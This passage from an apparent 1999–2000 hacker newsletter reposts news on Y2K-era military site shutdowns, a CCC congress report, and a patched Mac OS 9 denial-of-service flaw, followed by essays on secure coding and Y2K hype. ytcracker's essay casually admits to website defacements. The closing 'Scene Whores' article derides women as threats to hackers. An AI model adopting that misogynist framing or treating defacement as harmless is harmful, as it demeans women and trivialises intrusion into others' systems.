29.0 Pentagon and Others Take Air Force Lead and Shut Down Sites 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid
The Pentagon and the federal personnel agency will be
taking the Air Forces lead and will be shutting down
some of their public web sites over the new year
thereby denying US citizens of their right to access
public information. Fearing a massive 'hacker attack' the
agencies have decided it is better to shut down the
sites than repair any possible damage later. (If your
web site is vulnerable today it will be vulnerable
tomorrow. This tells me that you are not confident
enough in your own web sites ability to fend off attack
but you expect the American public to remain calm
during the Y2K rollover.)

Associated Press
http://dailynews.yahoo.com/h/ap/19991228/tc/y2k_national_9.html

Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/19991228/wr/yk_hackers_2.html

AP:

Tech Headlines
Add to My Yahoo!

Tuesday December 28 7:17 PM ET

Military Closing Web Sites for Y2K

By TOM RAUM Associated Press Writer

WASHINGTON (AP) - Taking last-minute precautions, the Pentagon and the
federal personnel agency are shutting down some of their public Internet
sites this weekend to keep them safe from computer hackers as the calendar
rolls over to 2000.

And the Department of Veterans Affairs has decided to mail January benefit
checks to more than 2.5 million veterans on Dec. 30, a day early, to avoid
potential delays related to the Y2K computer bug, officials disclosed
Tuesday.

The early mailings ``will mitigate unexpected year 2000 interruptions of
benefit payments arising from anything outside our control,'' VA spokesman
Terry Jemison said.

The Social Security administration announced last week that checks and
electronic deposits for 44 million elderly and disabled Americans also
would be dispatched for delivery a day early. Y2K-compliant files for
electronic Social Security payments will be at banks by Dec. 30
rather than the usual Dec. 31. Checks will be mailed earlier as well. Most
people normally would receive Social Security benefits on Jan. 3.

While making some last-minute adjustments, the government continued to
sound a note of optimism about the country's readiness.

The nation's top health official said people are not hoarding drugs so
there will not be any shortages of medicine over New Year's.

``Americans have used common sense,'' Health and Human Services Secretary
Donna Shalala said, citing a 60-90 day supply for nearly every category of
medicine.

Federal officials also expressed confidence about 911 calls going through
and public safety officials being able to dispatch services. But they
advised Americans to keep emergency numbers on hand.

``There was a way to call the police, to call ambulance services, long
before 911,'' Federal Communications Commissioner Michael Powell said.

Some problems, particularly overseas, may not become evident for weeks.
And those that show up Jan. 1 in early time zones may not be a good
predictor of what the United States can expect, according to Bruce
McConnell, director of the United Nations International Y2K
Cooperation Center.

Some of the government's emphasis switched from potential computer
glitches - nearly all of these have been fixed, officials insist - to the
threat of cyber attacks.

Many military installations around the country will be shutting down their
Web sites temporarily as a safeguard against intrusions - as well as a
protection against Year 2000 viruses that might be launched on New Year's
Eve.

``Within some defense agencies, they have thought the most prudent action
was just to take their sites offline,'' said Pentagon spokesman Adm. Craig
Quigley.

While the Pentagon intends to keep its central Web site -
www.defenselink.mil - in operation, Quigley said one site being
temporarily blocked is that of the Defense Finance and Accounting Service,
which oversees military pay. ``We're going the extra mile to make
sure our people's pay isn't affected,'' Quigley said.

Also being taken offline this weekend: the Web site maintained by the
Office of Personnel Management, which services the rest of the government
payroll.

Susan Hansen, a Pentagon spokeswoman who deals with Y2K issues, said
officials felt it was important to keep the main ``DefenseLink'' site up
because ``that's how we will be transmitting information during the
rollover.'' She said special precautions were taken to secure the
site.

Bases temporarily closing their Web sites include Wright-Patterson Air
Force Base in Dayton, Ohio. About 30 public sites are maintained at the
base, including Web pages for the United States Air Force Museum and the
Air Force Institute of Technology.

``We feel they (hackers) may plant some things on servers or e-mail that
might go off'' after the New Year begins, said Timothy Conley, deputy
director of the 88th Communications Group at Wright-Patterson. He said
there is no threat to national security because the public-access
sites are separated from secure sites, which will remain operational.

The commandant of the Marine Corps., Gen. James L. Jones, canceled weekend
travel plans, although aides said the changes were family-related and not
prompted by fears of Y2K disruptions.

Capt. Pete Mitchell, a spokesman for the corps, said the Marines were
taking various steps to make sure there is a ``seamless transition'' to
2000.

``It is a network security issue as much as it is a Y2K issue,'' said
Mitchell. ``All the branches are beginning to do things to restrict, to
limit the risks of intrusion by decreasing electronic footprints.''

In addition to tracking stations set up by each service, a centralized
Pentagon network monitoring system has been set up.

As for civilian communications, industry and federal leaders reiterated
their caution against people picking up the phone just to see if it is
working or dialing 911 just to check it.

Too many callers at once could clog the network, meaning some might get a
fast busy signal. But that wouldn't necessarily indicate any Y2K-related
problems, said the FCC's Powell.

``This is a basic network congestion issue that we see every Mother's Day.
This is Mother's Day on Viagra,'' he said.

The nation's largest telephone companies have said for months that their
networks are ready. But officials say they have more limited information
on international calling and smaller, rural U.S. phone companies.

Yahoo:

Tuesday December 28 9:46 PM ET

U.S. Air Force Cautions Web Sites on Y2K Hackers

WASHINGTON (Reuters) - The U.S. Air Force has given its 900 public Web
site managers permission to shut down the sites around the New Year to
guard against computer hackers, an Air Force spokesman said on Tuesday.

``There is no specific threat, it's simply heightened security. If you're
not up on the 31st, there is nothing they (hackers) can do about it,''
said spokesman Maj. Andree Swanson.

The message was delivered to the public Web site operators inside the Air
Force, the people who run facility and base Web pages. None of the sites
contains classified information.

``These decisions on whether to shut down or not is up to the individual
Web site,'' Swanson said.

The main Air Force page -- www.af.mil -- has no plans to close this
weekend.

``They all have the option to shut down, but it's not mandatory. Some
sites are more secure than others,'' Swanson said.

Hackers have invaded Air Force Web sites in the past, she said, noting
that many such attackers are looking to make a name for themselves.

President Clinton's top aide on Y2K matters earlier this month asked
computer hackers to exercise self-restraint until after Year 2000
technology fears have passed.

Y2K concerns revolve around computer systems programmed to read only the
last two digits of a year. If left uncorrected, it is feared systems will
read 2000 as 1900, causing widespread malfunction.

Adding to the anxiety are worries that hackers will take advantage of
possible Y2K confusion to pierce computer security defenses.

@HWA

30.0 More from CCC Congress in Germany 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime
As the latest Chaos Computer Club Congress goes into
full swing during its second day Wired reporter Steve
Kettmann issues his report. (I'm gonna hafta get over
there one of these years.)

Wired
http://www.wired.com/news/culture/0,1284,33312,00.html

Chaos Computer Club
http://www.ccc.de/

Chaos Hackers Seek Order
by Steve Kettmann

3:00 a.m. 29.Dec.1999 PST BERLIN -- Even if media-hyped panic over how
computers will handle the Y2K changeover gets people worked up over
nothing, the world could still be a better place as a result.

That, at least, was the impression emerging midway through this week's
three-day Chaos Computer Club hacking congress here. The renowned
visionaries of the CCC believe that technology matters a great deal in our
lives, much more than most people believe, and are pleased to see
the rest of the world catching up.

"The world is being reminded of how reliant on technology we are," said
CCC leader Frank Riegr. "Even if nothing happens, we will know more about
how technology and society are intertwined. Fortunately, in Germany there
hasn't been much talk about hackers doing evil, the way there has in the
United States. We have a very good standing here."

German politicians seek out CCC members as advisers: Club members gather
to take on the big questions, too, not just to share tips on issues like
"Buffer Overflows" -- the actual title for a Tuesday morning session at
the congress.

No facet of the intertwining of society and technology is as dramatic as
Tuesday's big theme -- the expanding reach of government surveillance,
popularized in American movies like Enemy of the State.

One early-afternoon workshop urged people to cooperate in a project to map
all the surveillance cameras in Kologne, and ultimately Germany. British
signal intelligence expert and journalist Duncan Campbell gave an address
on the extent world governments spy on each other -- and the rest of
us, too.

Campbell described in detail the system of ground-based listening stations
called Echelon that enables the US and British governments to intercept
transmissions -- and, most important, sort the data, earmarking what
receives closer scrutiny and filtering out what is to be ignored.

The European parliament is so concerned about Echelon -- whose existence
is still officially questioned -- that it commissioned a report from
Campbell and set hearings for this coming February. It's vindication for
Campbell, who has sounded the alarm over government intrusion into privacy
for decades, since first writing about the British version of the US
National Security Agency in 1976.

"This is really his finest hour," said Rop Gonggrijp, a hero to European
hackers for organizing the 1997 outdoor hacker camp HIP. "A lot of people
can see now that he wasn't just being paranoid when he said a lot of this
20 years ago.

"It's hard to come to terms with the fact that so many people don't
believe this is going on. You may have an idea about the scale of what
your government does, but you have to sort of ditch all of what you
thought you knew. Even people who have nothing to fear should be
aware of this because it will give you an idea of how the world really
works. All major wars have a signal intelligence component."

Campbell believes that government agencies like the NSA, featured in
1998's Enemy of the State, are moving more in the direction of monitoring
email and fax transmissions.

"Certainly it's unbelievable that they would make so major an investment
unless they are confident of getting into the big fiber-optic cables that
will be the backbone of planetary communication in coming decades," he
said.

"Enemy of the State both helped and hurt," Campbell added. "It helped
because it raised consciousness, but it hurt because it was off the wall.
It creates an impression of surveillance that's quite obviously not
possible. But that's Hollywood.

"It's a very difficult area for people to understand and believe.
Awareness is growing exponentially, first in Europe and also in the United
States. The NSA will survive. But they are going to face a big shakeup.
This creates the possibility that they can also be shaken up in
areas that lead to the protection of privacy."

@HWA

31.0 Apple Patches OS 9 Security Hole 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Space Rogue

A hole in the TCP/IP protocol stack on MacOS 9 could
leave users systems open to launching a distributed
attack without the users knowledge. MacOS 9's
networking software, Open Transport, will automatically
respond to certain data packets by triggering numerous
machines an attacker could overwhelm a target site
creating a denial of service attack. Apple released a
patch within hours of notification. (And during the
holidays as well, yeah Apple.)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2414764,00.html?chkpt=zdnntop

C|Net
http://news.cnet.com/news/0-1003-200-1508646.html?tag=st.ne.1002.thed.1003-200-1508646

Open Transport Tuner 1.0
http://asu.info.apple.com/swupdates.nsf/artnum/n11559

ZDNet;

Apple patches OS 9 security hole

Responding to security alerts, Apple has
released a patch for Mac OS 9 to prevent
hacks of networked Macs.

By Dan Turner, MacWEEK.com
December 28, 1999 5:59 PM PT

Apple Computer Inc. late Tuesday released a patch
for Mac OS 9's Open Transport networking
protocol to correct a "flaw" that leaves Macs vulnerable
to hackers who could enlist the computers over an
Internet connection in distributed denial-of-service
(DOS) attacks without the users' knowledge.

The flaw was discovered by Professor John Copeland of
the Georgia Institute of Technology, who heads that
school's School of Electrical and Computer Engineering.
Only Macs that are running Mac OS 9 and are attached
to "always-on" Internet connections, such as digital
subscriber lines (DSLs) and cable modems, are
vulnerable, Copeland said.

In an advisory from Carnegie Mellon University's computer
security center, Apple acknowledged earlier today that it
"reproduced the problem" and was "moving quickly to put
a solution in place." Hours later Apple posted the patch,
Open Transport Tuner 1.0, on its Software Updates Web
page.

Copeland told MacWEEK that attackers can "scan"
cable or DSL networks for computers running Mac OS 9;
these Macs can then be sent a small (29-byte) packet of
data, which Mac OS 9 replies to with a 1,500-byte
datagram.

"This appears to be the way Mac OS 9 explores an
Internet route," Copeland said. Attackers can then send
"trigger datagrams" with a false source address (that of
their target) to a large number of Mac OS 9 computers. If
these triggers are sent in rapid succession, Copeland
said, the "amplified" responses can overwhelm the
target's Internet connection, denying service to that
target.

Although DOS attacks are a fact of life on the Internet,
"it's much harder to stop a distributed attack," Copeland
said, because the sources of the attack aren't even aware
of their part in it, even as it occurs.

Prior to Apple's (Nasdaq: AAPL) release
of the patch, the only sure defense against
this exploit was for users to turn off or
disconnect their Internet connection, Copeland said.

"I've seen scans of this nature but no attacks yet," said
Copeland, who posted online warnings of this type of
DOS attack on New Year's Eve. However, Copeland told
MacWEEK his warnings are "pure speculation."

-=-

Net attacks could come through latest Apple system
By Jim Davis
Staff Writer, CNET News.com
December 29, 1999, 11:45 a.m. PT

update Computers with the newest version of Apple's Macintosh operating
system software could be used as unwitting aides to the latest fad in
Internet attacks, according to a new report.

Customers who have installed Mac OS 9 are susceptible to being used in
"denial of service" attacks from malicious programmers if their computer is
hooked up to the Internet via "always on" digital subscriber line (DSL) or
cable modem connections.

The computer expert who discovered the flaw said that it does not appear
that Mac computers themselves are being shut down by attacks, but that they
merely are capable of being used as pawns to harm other computers.

Dr. John Copeland, who chairs the Georgia Institute of Technology's School
of Electrical and Computer Engineering, said the correction for the flaw
needs to be applied before New Year's Eve in order to prevent the Macs from
being used to attack other computers. As previously reported by CNET
News.com, security experts have warned of a possible concerted effort to
attack computers on New Year's Eve.

Apple has already issued a fix for the problem at its Web site.

Carnegie Mellon University's Computer Emergency Response Team (CERT) said
in an advisory note that "Intruders can flood networks with overwhelming
amounts of traffic or cause machines to crash or otherwise become
unstable."

It does not appear that any computers have yet to be used in such attacks;
CERT merely reported that such an attack was possible. Cupertino,
Calif.-based Apple said in a posted reply to the CERT team: "We've
reproduced the problem in our labs. The problem only affects customers
running our most recent release of networking software on machines that are
continuously attached to the Internet."

"Apple is aware of the CERT advisory and has taken steps to address it,"
confirmed an Apple spokesman. "While we believe the potential risks to our
customers is extremely small, we have worked quickly to provide the latest
and most secure software to Mac users," he said.

In addition to being able to download the fix and installing the software
themselves, Mac OS 9 is capable of automatically updating itself with this
fix as it becomes available later on specialized Apple servers, but only
when the feature is enabled by the user.

Most Macintosh customers are not affected by this problem, Apple said.

Denial of service attacks aren't new, but there has been a sudden surge in
them. Recently, two new families of attacking programs, called the "Tribe
Flood Network" and "Trinoo" were identified by experts. Computer experts
believe that some attacks are timed to go off when the century turns.

Generally, denial of service attacks work like this: An attacker secretly
embeds software into hundreds of unwitting computers. Then, at a selected
time, a command is issued that prompts the infected computers to swamp a
target Web site or server with messages in a method of attack called
"denial of service." The program doesn't damage the "infected" carrier
computers or the target, but the sudden flood of messages typically knocks
out the target system.

The flaw in the Apple networking software, called Open Transport, could
allow an outsider to use a targeted Mac computer as a carrier.

Although it's possible for target computers to protect themselves from
denial-of-service attacks by ignoring messages, it's hard to identify which
computers are attacking them--especially when there are hundreds. This
fundamental vulnerability of networked computers makes protecting against
denial-of-service attacks extremely difficult.

A study released earlier this year reported that computer security breaches
were up 16 percent from 1996 to 1997, and that computer-related crime,
including security breaches, had cost 241 surveyed organizations $136
million last year.

Users of Macintosh computers, in general, have had fewer security issues to
deal with over the last few years, in part because there were simply more
Windows-based computers to target. But the system itself isn't impervious
to the usual array of viruses and other security issues--and neither is the
software that runs on it.

Last week, for instance, Microsoft said it resolved a potentially
troublesome security problem that would have affected online shoppers using
the Macintosh version of Internet Explorer. The company issued software
that fixes a glitch in the IE 4.5 Web browser which may have made shopping
via the Net a risky proposition if not fixed before Jan. 1, 2000.

The new Mac OS 9 security issue was first reported at the Macweek Web site.

@HWA

32.0 The need for physical security - Securing the OpenBSD console 12/29/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by grant
A white paper from 2600 Australia has been released
that covers the need for and reasoning behind physical
security of both the console and storage devices of a
particular computer and some distilled advice from the
misc@openbsd.org mailing list on ways in which the
OpenBSD console might be secured from unpassworded
physical access.

2600 Australia
http://www.2600.org.au/openbsd-console.html

@HWA

33.0 New Era: Buffer Overflow Article by evenprime 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/
A buffer overflow original article.

contributed by evenprime

Y2K has come and gone and left most people pretty
much unscathed. The massive effort to clean up messy
code over the last few years looks like it has paid off.
What can be learned from this? How can this be applied
to writing secure software for the coming millennium?
This new article in the Buffer Overflow section examines
these questions.

Buffer Overflow
http://www.hackernews.com/bufferoverflow/index.html

A New Era

Written By: evenprime

It is customary to do some reflection this time of year,
and I've been doing a little thinking about Y2K. I suppose
that makes sense, since it was the part of computing that
got the most media coverage the past year. It looks like
the date change caused very few problems, and most of
those were extremely minor. Still, there are lessons that
can be learned from the things that did happen.

It took a lot of time, effort and money to ensure that the
date change was uneventful. One thing to learn from Y2K
is that it is difficult to fix a program after it is developed
and implemented. Getting all the bugs out of a piece of
software that's currently in production usually requires
having an outside set of eyes look at the code, as the
Social Security Administration recently found out. The
application of this principle to the open source movement
is evident [1], but even closed source developers can
benefit by having their work audited by someone outside
the development team, or better yet, outside the
company. The DVD Copy Control Association have amply
demonstrated the dangers [2] of trying to locate your
own design flaws instead of letting someone else examine
your work.

Look back at how programming has been done, and at
what it has achieved. Date related bugs were everywhere,
and had to be fixed. Security bugs are still everywhere.
Unchecked input to static buffers, race conditions, and
programs that are installed with too many privilege are all
around us. All these things come from the same source: a
method of software development that focuses on
immediate results. It seems like the only concern most
developers have is that the program they write works
today, in our current network environment, with the input
they expect it to receive.

That's a flawed way to look at software use. Y2K has
taught us that the things we write will be used far longer
than we expect. Users ensure that our programs will
receive input that is not what we anticipated. [3] This
may be true even if our intended users are not looking for
bugs. :) I once wrote a user management script that, due
to not checking operator input, was capable of preventing
the entire user population from getting to applications
necessary for their jobs. A beginner's mistake, but one
that showed me how important it is to design programs so
that they fail gracefully.

The software problems we have are not new. Lions wrote
about race conditions back in 1977 [4]. Dr. Mudge was
writing about buffer overflows back in 1995. [5] Where
has this gotten us? Last week bugtraq readers were
informed of a root compromise via a race condition, and
there were six security-related buffer overflows. There are
tools [6] and techniques [7] out there to assist in secure
programming, but very few people use them, so we keep
seeing the same types of mistakes.

Politicians have noticed the net, and they tend to think it
is fairly important stuff. They have been tossing around
terms like "Information Super-highway". Presidential
Directives [8] have declared computer networks to be
part of "America's Critical Infrastructure". The FBI has set
up the National Infrastructure Protection Center to guard
our networks. Infrastructures are things that are built to
last, and when people begin comparing our computer
programs to them, we ought consider the assumptions
being made by the users. The highway analogy is kind of
interesting; the engineers responsible for highways add
saftey berms and guard rails to their designs, and they
don't run the roads over quicksand. They try to
incorporate safety into the design while it is still in the
planning stages.

If the rest of the world thinks that we are designing an
infrastructure, this industry needs to step back and look
at what it is doing. Y2K has taught us that we may be
using today's programs for a long, long time, so perhaps
we should begin to develop with a different emphasis. This
is a good time to consider abandoning the "functionality
first" way of doing things and adopting a "durability first"
mind set.

After all, a new millennium seems like a good time to begin
a new era of software developemnet.

1. "Open source keeps designers honest. By depriving
them of the crutch of obscurity, it forces them towards
using methods that are provably secure not only against
known attacks but against all possible attacks by an
intruder with full knowledge of the system and its source
code. This is real security, the kind cryptographers and
other professional paranoids respect." - ESR
http://www.tuxedo.org/~esr/writings/quake-cheats.html
http://www.tuxedo.org/~esr/writings/
cathedral-bazaar/cathedral-bazaar.html

2. "The lesson: This is yet another example of an industry
meeting in secret and designing a proprietary encryption
algorithm and protocol that ends up being embarrassingly
weak. I never understand why people don't use open,
published, trusted encryption algorithms and protocols.
They're always better." - Bruce Schneier
http://www.counterpane.com/crypto-gram-9911.html
#DVDEncryptionBroken

3. "Security engineering involves making sure things do
not fail in the presence of an intelligent and malicious
adversary who forces faults at precisely the worst time
and in precisely the worst way." - Bruce Schneier
http://www.counterpane.com/crypto-gram-9911.html
#WhyComputersareInsecure

4. The code for "swap has a number of interesting
features. In particular it displays in microcosm the
problems of race conditions when several processes are
running together....What happens next depends on the
order in which process A and process B are reactivated.
(Since they both have the same priority, "PSWP", it is a
toss-up which goes first.)
Lions, J., 1977. p. 15-2, "A commentary on the UNIX
operating system"

5. http://vapid.dhs.org/Library/bufferov.html

6. http://www.l0pht.com/slint.html

7. http://www.unixpower.org/security/

8. http://www.fas.org/irp/offdocs/pdd/index.html (#62 &
#63)

@HWA

34.0 Gangly Mentality, the Y2K hype by ytcracker 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/
A buffer overflow HNN original article.

Gangly Mentality
The story of the great Y2K swindle and what is
to come.

by YTCracker(phed@felons.org)

The Setup

What do billions of dollars, billions of useless books, and
billions of prophetic statements have in common? If you
guessed the infamous Y2K rollover, you are probably one
of the millions of people who were informed of some global
catastrophe set to take place the first of this year. There
was not a paper in publication these last few years that
didn't mention some sort of doomsday consequence
related to our society's dependancy on computers.

If you are any kind of normal human being you would have
expected something interesting out of this entire fiasco. I
expected something self-fulfilling. Mobs of fanatics and
drunks taking to the streets with automatic weapons
shouting verses out of the Bible, siphoning gas and
stealing stereo equipment. The most eventful happenings
in Denver and Colorado Springs were a few kids begging
the cops to beat them. It was worse than that when the
Broncos won the Super Bowl.

Digitally, I was surprised to see the overall lack of systems
compromised. I expected Attrition to be flooded up to
their necks in defacements. The staff had informed me
that they were planning on keeping a pretty good monitor
on things. Their major concern was cross-continental
defacements that represented some anti-government
motives. Sadly, there was no largescale cyber-shootout.
All was quiet in the land of the double-oh.

However, I don't think that we are out of the clear yet. A
few issues still need to be addressed. Just because the
infamous "Millenium Bug" turned out to be a farce[in a
general sense] does not constitute a sigh of relief. Every
threat that took place before the rollover is just as real.
Every security issue unaddressed prior to the first is still
something to reckon with. I would argue that we have
introduced a whole breed of new problems that have
absolutely nothing to do with something so trivial as a
system date.

The History

There was a time when the Internet was occupied by a
select few. In order to participate you required a little
more than standard knowledge of a computer. If you
didn't have some kind of dialup account provided by your
employer you were forced to shell out a great deal of
money for a meager ten hours. This regulation provided a
positive future for the Internet; a handful of
knowledgeable people were constructing the fabric of the
system while another handful of knowledgeable people
were engaging in mastering it. The only browser that
anyone used was NCSA Mosaic. Any application you used
was from the Trumpet Software suite. All the files you
ever wanted you obtained from Walnut Creek or the
Washington Archives. This environment led to quick
growth and a plethora of new frontiers.

In recent times, manufacturers have made it incredibly
easy to hop on the bandwagon and begin anew through
your phone line. Granted, this is a great thing. The
Internet is probably the single greatest invention of the
twentieth century. It possesses an endless wealth of
knowledge and power at your fingertips. These extremely
positive qualities make it very hard to believe that there is
a downside.

An obvious issue is this recent obsession with the New
Year. If another Melissa virus or Y2K-ish event emerges
the media will overexpose it beyond its true threat. Many
elements play into this exposure ranging from computers
rapidly becoming a part of everyone's life to a reporter's
burning urge to write a great story.

What can we attribute this obsession to? Ignorance. As
aforementioned, the Internet is no longer occupied by a
majority of intelligent and computer-literate individuals. It
is very simple to just hop online as a casual user and be
taken advantage of. It is also easy for a fairly casual user
to land a job in charge of the systems that govern your
use of the Internet. Entrusting this kind of information into
incapable hands is unnerving but it happens everyday. Bad
people are out there, you know.

The Dilemma

We now have an equation that doesn't balance out. We
have an extremely disproportioned Internet community
that consists of ignorant masses that can be led by simple
fear and heresy. On the other side of the fence we have
that original handful[sizewise], some of which are running
around like vigilantes for the good of the gangsters. The
other piece of that pie is looking to ruin your life, take
your credit card information, and load countless virii on
your computer. It is very doubtful that something like this
will happen to everyone[this is an extreme scenario], but
you get the point.

The broadcast ability that the Internet provides is a
potential tool to instigate a nationwide scare. Imagine if a
malicious user was to spam an authentic looking hoax
proclaiming that a new generation of virus has infested
itself in United States' vital computer systems and another
country is extorting us. "By the way, I work for the
Department of Energy. I'm not supposed to be releasing
this. I am jeopardizing my job for the greater good here."
It may be a little farfetched, however it's the principle
that is important. Due to the media potentially telling an
event such as this to the public with spokespeople
"refusing to comment," we usher in an age where a simple
rumor can affect an entire country in a very negative
manner.

Further banking off of the ignorance of the online
community, people have authored worms cleverly
disguised that are zipping around the world as you read
this. The media tends to focus more on a scare tactic
than an educative standpoint. This take on such events
only breeds more ignorance and it discourages people from
the truth of the matter.

It is my fear that if you were to take a general poll of the
streets asking fairly straightforward questions about the
topics in this article you would get some pretty weird
looks on people's faces. They would probably also tell you
that they think "hackers" are the root of all evil and that
they don't know much about the culture except that they
"use viruses" and "fuck with people." Who is to blame?

The Coverup

One of the biggest misunderstandings of the general public
is what really goes on behind the scenes. I will be the
first to admit that the defacements that I have
contributed to required little or no skill. While I may have
capitalized on an existing vulnerability, the root of the
problem is the same. You can code in as many languages
as you want or be a total newbie and it is still just as
easy to manipulate these vulnerabilities. If the general
public knew how simple it was to actually compromise a
server[excluding the hours/days/weeks to code and
conceptualize, but to dotslash-hax0r], they would have a
fit! Even more discouraging is the fact that such high
profile sites fall victim to these attacks.

This is what is depressing. Our so-called security experts
have fallen to mere children fooling around after school.
As regular Hackernews readers are probably informed, the
state of the Internet is slowly deteriorating into a
free-for-all.

Which brings me to my next point, cyberterrorism. Most
officials will attest that the United States is ready to
defend against such attacks. However, at the current
rate of growth concerning infrastructures and software
chalking up the version numbers, staying on top of things
these days is virtually impossible. A chain is only as strong
as its weakest link, and I'll be damned if those webservers
weren't some mighty weak links. Even though the majority
of classified information is maintained through a
SneakerNet[Nike or Reebok version 2.2 and higher], there
are careless individuals who will leave sensitive data for
the taking.

The End

Generally, people don't have much to fear. The army of
computer-impaired will eventually find some way to
evolve. I personally propose some sort of mandatory
education concerning surfing practice and what exactly
that big box that makes "clickity" noises really does.
Perhaps then people will be a little more mature when their
mouse disappears.

On the other hand, the governments of the world are
frantically running around trying to save face. Reason?
They don't want to be left behind. They know as well as
we do that there are plenty more problems where the
"Y2K Bug" came from. They are the ones that are going to
be in charge of mediating the situations as they arise.

Time to panic?

Not yet. Wait until 2028 when the seven-bit date
blows[2^7=128].

Until then have a happy 19100.

@HWA

35.0 "Scene Whores" By Eric Parker/Mind Security 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/
A buffer overflow HNN original article.

A well known, but overlooked threat to
Hackers. Scene Whores.

By: Erik Parker Mind Security

Let me start off with a quick preface to give some
explanation as to why I am writing this. First, this is going to
seem like a very sexist article, as I will always refer to
woman as the scene whores, and use 'she' when speaking
about scene whores. The reasoning behind this is, the
majority of hackers are men. I did not go out and take a poll
or anything, but I feel very safe in saying the majority of
hackers are male. This paper may use examples that you
might feel were written about you, or your situation, but the
reason it seems like this, is because most confrontations
with scene whores, are very much alike. I wanted to take
Lance Spitzners Papers on "Known your Enemy" and
reword them to apply here, as script kiddie and scene
whores are very much alike, they just use different common
tools.

Now I know what you are thinking, that this article must be a
joke, or that I must be writing it out of anger because of
something that has happened to me. Well yes I have first
hand knowledge of the Scene whores, however I haven't
been directly involved with one for a couple of years. This is
spawning off of watching other relationships, and seeing
many scene whores come and go, that have their reasons.
If I had to speculate on why they do it, I would say a majority
of them don't realize they are, that it is something in their
sub-conscience making them do it. Whether it is for
popularity in the "scene", or they think they will learn more by
sleeping their way up the hacker ladder. This article is not a
joke. They are a real threat. They waste our time, ruin
friendships, cause chaos between hackers, and generally
ruin periods of our life. A sure sign after being compromised
by a scene whore, after they are are done with you, is when
you go to talk to friends you have neglected during the period
of compromise, and they say "Welcome back, we missed
you". However, what has to be figured out, is how to make
there never be a period of time like that.

Scene whores can be found in several places. I think a very
common one is on IRC. Other places like 2600 meetings,
Conventions (Like Defcon), and even meet them through
your friends, who may have met them in the above
mentioned ways. Some very unlucky guys get scene
whores right from the start, when they first turn into it. The
scene whore has decided that Hackers look glamorous, or
they find out how large your salary is, compared to hers, her
current boyfriends, or even her parents combined. We are a
rare species I suppose, we are in an age where we wear
what we want, we don't necessarily need a college
background, we are making 6 digit figures, and setting the
rules for our selves. Anyway you look at it, scene whores
can look and think that we have power, money, and we are
the stereo typed "cool". Some of us are all of the above, and
into drugs, and many girls find drugs to be an attractive
feature. I don't have a lot of experience with scene whores
and drug related things, as I went a different direction and
stayed away from most of the drug scene.

There is a very classic approach that is seen in most cases.
This is an easy one to see coming, if you do a little history
research about the possible scene whore before you get
involved. The Ladder approach is what I like to call it. In most
cases when dealing with a ladder, you start at the bottom
and work your way up. Just like the scene whore does. They
try to get networked into the scene by finding someone who
knows something, or at the very least, knows someone who
knows something. If they are good looking, or partially good
looking and easy, they have no problems with this approach.
There is one good thing to say about the majority, most of
them learn something on the way. If nothing else, they
usually learn what the internet is, how to IRC, how to login to
NT, and maybe even how to work IRC under a non-windows
platform. They will go with bottom rung hacker for a little
while, and then once the scene whore has met enough of
the hackers friends, or actually gets to be known a little bit,
and meets a few people on their own, they find someone
more interesting.. Someone who seems smarter, and has
more friends, or has been in the media more, or has some
noted accomplishments. Usually this person is a friend, or
acquaintance of the first hacker. They move on, and this
usually destroys the friend with the new target, and the old
target, as well as with the scene whore, and the old target.
One term scene whores should learn is, be nice to hackers
on your way up, because you will be seeing them again on
your way up again. Hopefully we can start identifying scene
whores quicker, and securing ourselves against them
quicker, and put them out of commission.

In the above mentioned method, scene whores can make it
up just a few guys, or make it along dozens of people. You
can get a good idea of how many people scene whores
sleep with by reading the Hacker Sex Chart. You will notice
some scene whores with a dozen or more links on there.
You will notice some very well known people on that list, and
notice even they got sucked into the claws of a scene whore
before. Scene whores who sleep around, and think that sex
will gain them knowledge find out in the end that they are just
worthless whores who had a good time, and probably picked
up more diseases than knowledge.

There are other methods.. Or lack thereof, that scene
whores use. Some are not in it just to get to the top. Some
are in it, just to meet as many people as they can, and have
as much "fun" as they can. These are Good looking scene
whores, to the nastiest of scene whores. There is always a
hacker, or a perhaps a drunk hacker, that will do the nastiest
of scene whore. These ones are even worse than the
Ladder Climbers, as they usually tend to sleep with more
people, have less commitments. Well, this depends. They
aren't as bad as the ladder climbers in the way that they
don't consume as much of the hackers precious time, and
usually don't make people leave their friends. These girls do
however tend to breakup more friendships than the ladder
climbers, as they cover more ground. The friendships that
were strong usually get repaired though, as they quickly
realize she was a scene whore. These scene whores are
usually detected a lot quicker than others.

Then there are the extremely ignorant scene whores. The
ones that make the other types look intelligent. These are
the ones who watched the movie 'Hackers', and have only
heard about the criminal side of hackers. They want to get
into it for the feel of doing something bad. Thinking they will
find a group of hackers that can get them millions from a
bank, or do something so illegal that it turns them on. You
know the types, the types of people who get excited at the
thought of doing something naughty. Like having sex in a
church during Sunday morning gatherings. These scene
whores usually only end up finding stupid web site defacers,
who introduce them selves as hackers, when they are really
mistaken, and are just script kiddies and crackers.
Sometimes these hackers actually do something illegal, and
the scene whore finds it very erotic and loves it. A few
weeks later the Cracker is arrested, and the scene whore
testifies against them, and the cracker gets fined, spends
time in jail, or ends up without their computer for years.

Now the hard part is.. To determine which ones aren't scene
whores. The ones who have been with other hackers, but
are true and honest, and like you for who you are. I can't say
the best way to determine this. I think it is easier to just try
and detect the scene whores, and eliminate them, than to try
and find a way to detect non-scene whores, if that makes
any sense to you. There are cases where the non-scene
whore had legitimate relationships with other hackers, and it
just happens that you are the right person for them. The fact
